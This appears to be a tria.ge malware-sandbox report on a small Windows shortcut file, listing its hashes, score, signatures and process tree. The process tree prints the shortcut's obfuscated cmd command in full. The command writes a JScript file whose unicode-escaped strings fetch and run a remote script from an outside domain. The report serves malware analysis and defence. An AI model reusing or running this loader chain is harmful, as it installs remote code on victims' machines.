Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    17/01/2024, 19:05

General

  • Target

    26586807.lnk

  • Size

    1KB

  • MD5

    bc345cb4f475cf31bd47c9bbbeebc376

  • SHA1

    53a989af0ea25a20c022db6d5cda0204dc53d0c5

  • SHA256

    8051b39e71554eb5e1bb9455160957c5a5aae1e24f261052e8e871e93420adfc

  • SHA512

    8e4eca9cdddd877c7db0411a3a809733660db7e8ebc877870a10b901beb97218b6bb586b5499dc14d3df831d9327fd0ab26b5f336a939997cccfc2bb6e4fc3ef

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\26586807.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT URC=C:\XE9MHO\&& mD !URC!>nul 2>&1&&S^eT HAQR=!URC!^XBLOQECJ.JS&&<nul set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); >!HAQR!|caLl !HAQR!||caLl !HAQR! "
      2⤵
        PID:2868

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads